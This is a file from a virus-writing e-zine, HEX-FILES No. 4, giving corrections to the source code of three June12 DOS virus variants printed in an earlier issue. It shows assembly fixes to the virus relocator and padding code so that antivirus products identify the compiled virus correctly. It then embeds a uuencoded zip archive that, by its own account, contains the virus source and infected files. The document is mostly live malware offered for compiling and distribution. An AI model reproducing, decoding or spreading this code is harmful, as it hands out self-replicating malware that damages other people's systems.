 
  HEX-FILES No. 4                                                   File 017
 ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ 
 
 
    ERRATA: June12
    ~~~~~~~~~~~~~~
 
    Corrections to the source codes of June12.Standard.2660, 
    June12.Standard.2695 and June12.AntiSPCPD.2660 as they appeared in 
    HEX-FILES No. 3. I would like to state here that there were no 
    attempt to create new variants of these viruses.
 
    Newer releases of AVs identify the virus created when the source 
    codes of the three June12 variants in HEX-FILES No.3  are compiled as 
    "June12.26xx.unknown" in the case of F-Prot and "This virus is like 
    June12th" or "This virus is like XMarks" in the case of Dr. Solomon. 
 
    Although I made sure that the viruses created from the source codes 
    would create an exact copy, some modifications were indeed made as 
    follows: 
 
       The June12 virus relocator ("VirusJumper") in HEX-FILES No. 3 has 
       'PK' as the initial value of "VxSeg" or the segment of the virus 
       with respect to the PSP. I overlooked the fact that the segment is 
       initialized in the allocated memory and not in the virus segment, 
       keeping the initial value of VxSeg in the virus code (originally 
       00 hex) unchanged. I erroneously placed 'PK' (for vanity's sake) 
       thinking that this would be overwritten when the virus initialized 
       VxSeg. As it turned out, I messed it up.
 
          VirusJumper:
                 push    cs 
                 mov     ax,cs 
           VxSeg:add     ax,'PK'
                 push    ax 
                 xor     ax,ax
                 push    ax 
                 retf 
 
       Replace the instruction in VxSeg with:
 
           VxSeg:add     ax,0
 
 
       would make F-Prot identify all three variants included in 
       HEX-FILES No. 3 as it should be.
 
       However, Dr. Solomon still does not detect an exact virus after 
       the changes. It further expects the content of offsets starting 
       from the end of the virus code up to the end of the paragraph to 
       be filled with hex 00. To adapt the codes to Dr. Solomon's variant 
       differentiation method, we have to paragraph align the first 
       generation codes as follows:
 
 
          HoldTheNote:
                 cmp     byte ptr [si],0
                 jne     HoldTheNote
                 pop     si 
                 pop     ds 
                 add     si,2 
                 inc     di 
                 cmp     byte ptr [si],2ch
                 jne     MusicPlayer
                 ret
          ;------------------------- virus code ends here
          EndOfJune12:
 
          ParaSlack  equ (offset EndOfJune12-offset June12Entry)
          ParaPad    db  ((((ParaSlack+15)/16)*16)-ParaSlack) dup (0)
 
          FirstGeneration:
                 mov     ax,cs
                 mov     ss,ax
                 mov     sp,VirusStack
          ..
           
 
       We could not use "align 16" because the compiler might fill the 
       slack with a character other than hex 00, usually 90h. You would 
       also notice that we removed "EndOfJune12" as label of our first 
       generation codes because it is used to determine the virus length.
 
       Do you think these changes to the original virus merits 
       classification as new variants? If you ask me, I don't think so. 
       Since virus naming is most of the time dependent on the whims of 
       AVs, then it is up to them to do what pleases them! :)
 
 
    The following is the uuencoded zip file containing the source  of the 
    three June12s that would not cause undue alarm to your AVs when 
    compiled. The infected files from a compiled version of the source 
    codes are also included inside the zip file. 
 
    You would need PKUNZIP.EXE (or any ZIP compatible program) to extract 
    the content of the zip file. If you don't know how to use that 
    program, read its doc.
 

 ÄÄ HF4PACK1.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

begin 644 hf4pack1.zip
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
